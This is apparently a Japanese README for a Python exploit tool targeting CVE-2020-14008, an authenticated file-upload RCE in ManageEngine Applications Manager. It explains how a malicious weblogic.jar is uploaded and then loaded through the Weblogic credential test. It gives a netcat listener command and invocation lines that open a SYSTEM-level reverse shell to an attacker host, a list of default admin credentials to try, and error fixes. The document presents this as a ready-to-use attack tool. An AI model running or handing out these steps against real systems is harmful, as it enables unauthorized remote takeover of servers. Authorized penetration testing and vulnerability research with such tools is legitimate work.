
CVE-2020-14008 - ManageEngine Applications Manager RCE
Zoho ManageEngine Applications Managerにおける、任意のファイルアップロードを介した認証済みリモートコード実行(バージョン14720以下)。
| 詳細 | 値 |
|---|
| CVE | CVE-2020-14008 |
| CVSS | 7.2 (High) |
| 種類 | 認証済みRCE / 任意ファイルアップロード |
| 製品 | Zoho ManageEngine Applications Manager |
| 影響を受けるバージョン | Version 14720 and below |
| 必要条件 | 有効な管理者認証情報 |
| 結果 | SYSTEMレベルのリバースシェル |
本エクスプロイトは、Weblogic モニター資格情報テスト機能を悪用します。認証された管理者が悪意のある weblogic.jar ファイルを所定の Weblogic ライブラリパスにアップロードします。資格情報テストがトリガーされると、ManageEngine はアップロードされた JAR 内の weblogic.jndi.Environment を JarLoader.loadClass() および newInstance() を介してロードし、任意の Java コードを実行します。
javac と jar がPATHに含まれていること)nc(netcat)pip3 install requests urllib3 lxml
nc -lvnp 1337
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>
# Basic
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337
weblogic.jndi.Environment)をコンパイルしてweblogic.jarを作成classes/weblogic/version8/にアップロード(フォールバック:移動するためのスケジュールタスクを作成)/testCredential.do でWeblogicの資格情報テストを呼び出し、悪意のあるクラスをロードしてインスタンス化| ユーザー名 | パスワード |
|---|---|
| admin | admin |
| admin | password |
| administrator | administrator |
| guest | guest |
| エラー | 修正方法 |
|---|---|
release version 7 not supported | Java 21以降はJava 7ターゲットを廃止しています。スクリプトは--release 8を使用します。 |
FileNotFoundError: weblogic.jar | JARのコンパイルに失敗しました。javacとjarがPATHに含まれているか確認してください。 |
No valid response from used session | 認証情報が無効です |
Actionname not found | タスクの作成に失敗しました。管理者権限を確認してください。 |
このツールは、許可されたペネトレーションテストおよびセキュリティ研究のみを目的として提供されています。自分が所有していない、またはテストする許可を得ていないシステムに対する不正使用は違法です。